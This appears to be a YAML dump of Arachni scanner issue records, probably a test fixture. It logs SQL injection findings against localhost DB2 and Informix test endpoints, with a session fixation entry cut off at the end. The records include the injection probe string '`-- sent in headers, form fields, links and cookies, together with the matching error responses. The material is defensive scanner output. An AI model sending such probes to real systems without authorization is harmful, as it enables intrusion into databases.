  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "241"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/db2/header/flip
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"DB2 SQL error:\\n[IBM][CLI Driver][DB2/6000]\\nCLI Driver stuff DB2\\nDB2 SQL error\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/db2/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "78"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "DB2 SQL error:"
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:DB2 SQL error:)
      :match: "DB2 SQL error:"
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/db2/header/append
      :verification: false
      :id: "DB2 SQL error:"
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:DB2 SQL error:)
    regexp_match: "DB2 SQL error:"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      DB2 SQL error:
      [IBM][CLI Driver][DB2/6000]
      CLI Driver stuff DB2
      DB2 SQL error

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/db2/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/form/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "108"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: form
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/informix/form/flip
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"An illegal character has been found in the statement\\ncom.informix.jdbc\\nException stuff Informix\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/form/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: form
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "96"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: form
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/informix/form/append
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      An illegal character has been found in the statement
      com.informix.jdbc
      Exception stuff Informix

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/link/flip?input=default
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "108"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: link
      :params: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :follow_location: true
      :injected: ""
      :combo: 
        input: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/informix/link/flip?input=default
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[\"An illegal character has been found in the statement\\ncom.informix.jdbc\\nException stuff Informix\\n\", nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/link/flip?input=default
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: link
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "96"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: default'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :param_flip: true
      :injected_orig: "'`--"
      :altered: input
      :element: link
      :params: 
        input: default'`--
      :follow_location: true
      :injected: default'`--
      :combo: 
        input: default'`--
      :action: http://localhost:7842/informix/link/append?input=default
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      An illegal character has been found in the statement
      com.informix.jdbc
      Exception stuff Informix

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/cookie/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value;'`--=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "108"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/informix/cookie/flip
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, \"An illegal character has been found in the statement\\ncom.informix.jdbc\\nException stuff Informix\\n\"]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/cookie/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: cookie
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie2=cookie+value'`--
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "96"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: cookie value'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value'`--
      :injected: cookie value'`--
      :combo: 
        cookie2: cookie value'`--
      :action: http://localhost:7842/informix/cookie/append
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      An illegal character has been found in the statement
      com.informix.jdbc
      Exception stuff Informix

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/header/flip
  var: Parameter flip
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "258"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: ""
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: Parameter flip
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :injected: ""
      :combo: 
        "'`--": 71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1
      :action: http://localhost:7842/informix/header/flip
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: "[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, \"An illegal character has been found in the statement\\ncom.informix.jdbc\\nException stuff Informix\\n\", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]"
    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/header/flip
    var: Parameter flip
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: SQL code can be injected into the web application.
  elem: header
  internal_modname: SQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: SQLInjection
  name: SQL Injection
  references: 
    UnixWiz: http://unixwiz.net/techtips/sql-injection.html
    Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
    SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
    OWASP: http://www.owasp.org/index.php/SQL_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in database queries.
  severity: High
  tags: 
  - sql
  - injection
  - regexp
  - database
  - error
  url: http://localhost:7842/informix/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: SQL code can be injected into the web application.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user'`--
        Cookie: cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "96"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: com.informix.jdbc
    injected: arachni_user'`--
    internal_modname: SQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: SQLInjection
    name: SQL Injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:com\.informix\.jdbc)
      :match: com.informix.jdbc
      :substring: 
      :ignore: 
      - String or binary data would be truncated
      - Access denied for user
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: "'`--"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user'`--
      :injected: arachni_user'`--
      :combo: 
        User-Agent: arachni_user'`--
      :action: http://localhost:7842/informix/header/append
      :verification: false
      :id: com.informix.jdbc
    references: 
      UnixWiz: http://unixwiz.net/techtips/sql-injection.html
      Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
      SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      OWASP: http://www.owasp.org/index.php/SQL_Injection
    regexp: (?i-mx:com\.informix\.jdbc)
    regexp_match: com.informix.jdbc
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in database queries.
    response: |
      An illegal character has been found in the statement
      com.informix.jdbc
      Exception stuff Informix

    severity: High
    tags: 
    - sql
    - injection
    - regexp
    - database
    - error
    url: http://localhost:7842/informix/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "384"
  cwe_url: http://cwe.mitre.org/data/definitions/384.html
  description: The web application allows the session ID to be fixed by a 3rd party.
  elem: form
  internal_modname: SessionFixation
  method: GET
  mod_name: Session fixation
  name: Session fixation
  references: 
    OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation
  severity: High
  tags: 
  - session
  - cookie
  - injection
  - fixation
  - hijacking
  url: http://localhost:9008/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "384"
    cwe_url: http://cwe.mitre.org/data/definitions/384.html
    description: The web application allows the session ID to be fixed by a 3rd party.
